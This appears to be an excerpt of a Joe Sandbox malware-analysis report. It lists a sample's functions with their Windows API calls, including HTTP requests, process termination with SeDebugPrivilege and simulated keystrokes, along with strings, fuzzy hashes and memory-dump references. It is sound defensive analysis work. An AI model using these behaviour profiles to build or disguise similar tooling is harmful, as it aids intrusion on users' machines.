                                        • Opcode ID: 458a793eb627ce38743ebf0a7b43ea48a89e1bb538b78da28bc89e5f3e1bc8bf
                                        • Instruction ID: a3c6f75fabab564ffbfc31b93f90ca38dbfec24e496832118f1da3b2c4322bf7
                                        • Opcode Fuzzy Hash: 458a793eb627ce38743ebf0a7b43ea48a89e1bb538b78da28bc89e5f3e1bc8bf
                                        • Instruction Fuzzy Hash: 04710131501248DFCF31DFA4C884ABA7BB5FF48360F244A69ED569A1A6C7398C41DB61
                                        Function 007C4C23 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 007C4C5E
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 007C4C8A
                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 007C4CCC
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 007C4CE1
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007C4CEE
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 007C4D1E
                                        • InternetCloseHandle.WININET(00000000), ref: 007C4D65
                                          • Part of subcall function 007C56A9: GetLastError.KERNEL32(?,?,007C4A2B,00000000,00000000,00000001), ref: 007C56BE
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                        • String ID:
                                        • API String ID: 1241431887-3916222277
                                        • Opcode ID: d5913e0cb8900a8fdb56c9c87190f651ce8bdd47cb7ce7c7c532ce350b376013
                                        • Instruction ID: e3af159927f4ca3b1fd0c1e678cab42a131085512d41556b44fddcae94331a77
                                        • Opcode Fuzzy Hash: d5913e0cb8900a8fdb56c9c87190f651ce8bdd47cb7ce7c7c532ce350b376013
                                        • Instruction Fuzzy Hash: 38417DB1601618BFEB22AF60CC99FFA77ADFF08314F10811EFA019A151D7789D449BA4
                                        Function 007CBAE6 Relevance: 13.9, APIs: 9, Instructions: 419COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0080DBF0), ref: 007CBBA1
                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0080DBF0), ref: 007CBBD5
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007CBD33
                                        • SysFreeString.OLEAUT32(?), ref: 007CBD5D
                                        • StringFromGUID2.COMBASE(?,?,00000028), ref: 007CBEAD
                                        • ProgIDFromCLSID.COMBASE(?,?), ref: 007CBEF7
                                        • CoTaskMemFree.COMBASE(?), ref: 007CBF14
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Free$FromString$FileLibraryModuleNamePathProgQueryTaskType
                                        • String ID:
                                        • API String ID: 793797124-0
                                        • Opcode ID: 54165bdf21db30838f5d91f28a824fc17f759dadf1516956cacedaf2f6b5f1ca
                                        • Instruction ID: a63d9775172cd185c6687a1d36732475cf8079972ce23ae8b14f0793be369c2a
                                        • Opcode Fuzzy Hash: 54165bdf21db30838f5d91f28a824fc17f759dadf1516956cacedaf2f6b5f1ca
                                        • Instruction Fuzzy Hash: F8F11875A00109EFCB14DFA4C899EAEB7B9FF89715F10849CF905AB250DB35AE41CB50
                                        Function 0078B86E Relevance: 13.7, APIs: 9, Instructions: 170timeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007749CA: InvalidateRect.USER32(?,00000000,00000001), ref: 00774A23
                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0078B85B), ref: 0078B926
                                        • KillTimer.USER32(00000000,?,?,?,?,0078B85B,00000000,?,?,0078AF1E,?,?), ref: 0078B9BD
                                        • DestroyAcceleratorTable.USER32(00000000), ref: 007EE775
                                        • DeleteObject.GDI32(00000000), ref: 007EE7EB
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Destroy$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                        • String ID:
                                        • API String ID: 2402799130-0
                                        • Opcode ID: 31a910a0e898598d63cb8e7c0af0076adf7a6be7fd3addca379ae046d83525d4
                                        • Instruction ID: 6d4d13567c89ae02ec6c8f10047e99689b76184652c5d385f36a9e232ff03244
                                        • Opcode Fuzzy Hash: 31a910a0e898598d63cb8e7c0af0076adf7a6be7fd3addca379ae046d83525d4
                                        • Instruction Fuzzy Hash: 86616930141701DFDB35AF26D988B35BBF6FB99712F144929E18686A70C778B890DB88
                                        Function 007DB14A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                        Download Yara Rule
                                        APIs
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007DB204
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InvalidateRect
                                        • String ID:
                                        • API String ID: 634782764-0
                                        • Opcode ID: 0eed7b4d4494af02d357b4d4a80b16d992d5b3eccda9e623e4a21ed2f6addaad
                                        • Instruction ID: 9ea6b0c87c74f506774ad19359f3bbcccd8698c4ccc8440828f8861482227b85
                                        • Opcode Fuzzy Hash: 0eed7b4d4494af02d357b4d4a80b16d992d5b3eccda9e623e4a21ed2f6addaad
                                        • Instruction Fuzzy Hash: CC516E31600208FEEF20AB288C99BAE3B75BB06764F214517F915D63A1DB79E9509B50
                                        Function 0078A599 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 007EE9EA
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007EEA0B
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 007EEA20
                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 007EEA3D
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 007EEA64
                                        • DestroyCursor.USER32(00000000), ref: 007EEA6F
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 007EEA8C
                                        • DestroyCursor.USER32(00000000), ref: 007EEA97
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CursorDestroyExtractIconImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 3992029641-0
                                        • Opcode ID: fc6fb3ea3be142ac3fe4d4270dfe4e1ee20032f7370d40cb45255731a8402996
                                        • Instruction ID: d7fab4c2fc52a8446782f71402d2d386c079cba1b534f4850f2e9e27f28aebff
                                        • Opcode Fuzzy Hash: fc6fb3ea3be142ac3fe4d4270dfe4e1ee20032f7370d40cb45255731a8402996
                                        • Instruction Fuzzy Hash: 9F51AB70640205EFEB20EF65CC85FAA77F5BB48750F104A29F94697290E7B8EC90CB51
                                        Function 0078F6B5 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 0078F737
                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 0078F77E
                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 007EEB55
                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,007EE9A0,00000004,00000000,00000000), ref: 007EEBC1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 802c6c66db86bd76c0aa4221c41c040459cd9455ae3d991a7abd2225ad8688f7
                                        • Instruction ID: 948af06d694b9db17b91556c7fe927f0dbef07be4be892d3781e35e690378ccd
                                        • Opcode Fuzzy Hash: 802c6c66db86bd76c0aa4221c41c040459cd9455ae3d991a7abd2225ad8688f7
                                        • Instruction Fuzzy Hash: E84117702496C0EAFB357B398CCCB7A7B96AB49305FA84C3DE08BC6561D67CA840D715
                                        Function 007ACDE6 Relevance: 13.6, APIs: 9, Instructions: 65sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007AE138: GetWindowThreadProcessId.USER32(?,00000000), ref: 007AE158
                                          • Part of subcall function 007AE138: GetCurrentThreadId.KERNEL32 ref: 007AE15F
                                          • Part of subcall function 007AE138: AttachThreadInput.USER32(00000000,?,007ACDFB,?,00000001), ref: 007AE166
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE06
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 007ACE23
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 007ACE26
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE2F
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 007ACE4D
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007ACE50
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 007ACE59
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 007ACE70
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 007ACE73
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: 74e5005e066492264c202a33a04c6fead6f17700c4c0c5425d30accce354ad75
                                        • Instruction ID: 6f045008ef909c85259df76ec80b02277b715837c2eef28489f0381ab506ff21
                                        • Opcode Fuzzy Hash: 74e5005e066492264c202a33a04c6fead6f17700c4c0c5425d30accce354ad75
                                        • Instruction Fuzzy Hash: 6A1104B152061CBEF7212F60CC8EF6A3B2EDB48794F110515F340AB0E0C9FA6C10DAA8
                                        Function 007CC604 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007AA857: CLSIDFromProgID.COMBASE ref: 007AA874
                                          • Part of subcall function 007AA857: ProgIDFromCLSID.COMBASE(?,00000000), ref: 007AA88F
                                          • Part of subcall function 007AA857: lstrcmpiW.KERNEL32(?,00000000), ref: 007AA89D
                                          • Part of subcall function 007AA857: CoTaskMemFree.COMBASE(00000000), ref: 007AA8AD
                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 007CC6AD
                                        • _memset.LIBCMT ref: 007CC6BA
                                        • _memset.LIBCMT ref: 007CC7D8
                                        • CoCreateInstanceEx.COMBASE(?,00000000,00000015,?,00000001,00000001), ref: 007CC804
                                        • CoTaskMemFree.COMBASE(?), ref: 007CC80F
                                        Strings
                                        • NULL Pointer assignment, xrefs: 007CC85D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                        • String ID: NULL Pointer assignment
                                        • API String ID: 1300414916-2785691316
                                        • Opcode ID: 828e3ba2f8200f2cba73b3f2b32fb46a90d673a927a2f2922356a08dab747102
                                        • Instruction ID: 756b77e1ffe4754462542e2a9838b4081feed09e08ae2202f37b2b0c9fac9eff
                                        • Opcode Fuzzy Hash: 828e3ba2f8200f2cba73b3f2b32fb46a90d673a927a2f2922356a08dab747102
                                        • Instruction Fuzzy Hash: BC914771D00218EBDB21DFA4DC85FDEBBB9EF08750F20816AE519A7281DB745A45CFA0
                                        Function 007D9882 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007D9926
                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 007D993A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007D9954
                                        • _wcscat.LIBCMT ref: 007D99AF
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 007D99C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007D99F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcscat
                                        • String ID: SysListView32
                                        • API String ID: 307300125-78025650
                                        • Opcode ID: d4df415842734df956e46c6a791d559091f98a39f8676a352a90ee4de2972c11
                                        • Instruction ID: 2b1dbf4e0fd5bb4b740dd41fc01d3d4cf72ac22734f72952ed49fe7310c69774
                                        • Opcode Fuzzy Hash: d4df415842734df956e46c6a791d559091f98a39f8676a352a90ee4de2972c11
                                        • Instruction Fuzzy Hash: 7D41C471900308EFDF219FA4C889BEE77B8EF48754F10442AF645E7291D2799D84CB64
                                        Function 007D1620 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B6F5B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007B6F7D
                                          • Part of subcall function 007B6F5B: Process32FirstW.KERNEL32(00000000,0000022C), ref: 007B6F8D
                                          • Part of subcall function 007B6F5B: CloseHandle.KERNEL32(00000000,?,00000000), ref: 007B7022
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D168B
                                        • GetLastError.KERNEL32 ref: 007D169E
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D16CA
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D1746
                                        • GetLastError.KERNEL32(00000000), ref: 007D1751
                                        • CloseHandle.KERNEL32(00000000), ref: 007D1786
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: 2ea98562ca92b6cd96d9339f6ddab2a29212951ce5dcd369faa1111ffde2f65c
                                        • Instruction ID: 14833adccdfc816f6e98b8ea2c295888cef2d8bb867a08d59ae3697547772275
                                        • Opcode Fuzzy Hash: 2ea98562ca92b6cd96d9339f6ddab2a29212951ce5dcd369faa1111ffde2f65c
                                        • Instruction Fuzzy Hash: FA419A71640201EFDB15EF64C8A9FADB7A5AF44315F198049F9069F3A2EB7C9D00CB51
                                        Function 007B6237 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 007B62D6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 303c44b26868a5cc6d666bcf43ad9251e26374581e5477c7da3a0157ea0df1fe
                                        • Instruction ID: 643faf53fdd59b3611092bcd780fec6c49173de1f1a3d1b18475a69860cb1704
                                        • Opcode Fuzzy Hash: 303c44b26868a5cc6d666bcf43ad9251e26374581e5477c7da3a0157ea0df1fe
                                        • Instruction Fuzzy Hash: 0811D076608353BAF7055B54AC56FFA739CFF25724B100029F701A6281FBAC69409564
                                        Function 007B757B Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000100,00000000), ref: 007B7595
                                        • LoadStringW.USER32(00000000), ref: 007B759C
                                        • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007B75B2
                                        • LoadStringW.USER32(00000000), ref: 007B75B9
                                        • _wprintf.LIBCMT ref: 007B75DF
                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007B75FD
                                        Strings
                                        • %s (%d) : ==> %s: %s %s, xrefs: 007B75DA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: HandleLoadModuleString$Message_wprintf
                                        • String ID: %s (%d) : ==> %s: %s %s
                                        • API String ID: 3648134473-3128320259
                                        • Opcode ID: 2415146f724def6313f3dac5d75e009f12bf3a15eb90765027d3fdde4cefbc5f
                                        • Instruction ID: ffb1d5c4495746ec2bde2a22b1ca745363a7aca01f6c3d685ea59161391d6a9d
                                        • Opcode Fuzzy Hash: 2415146f724def6313f3dac5d75e009f12bf3a15eb90765027d3fdde4cefbc5f
                                        • Instruction Fuzzy Hash: 790112F2500208BFE721A7D4AD89EF6776CDB08305F004495B745D6141EA789E84CB79
                                        Function 007D2A0A Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                          • Part of subcall function 007D3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D2AA6,?,?), ref: 007D3B0E
                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007D2AE7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
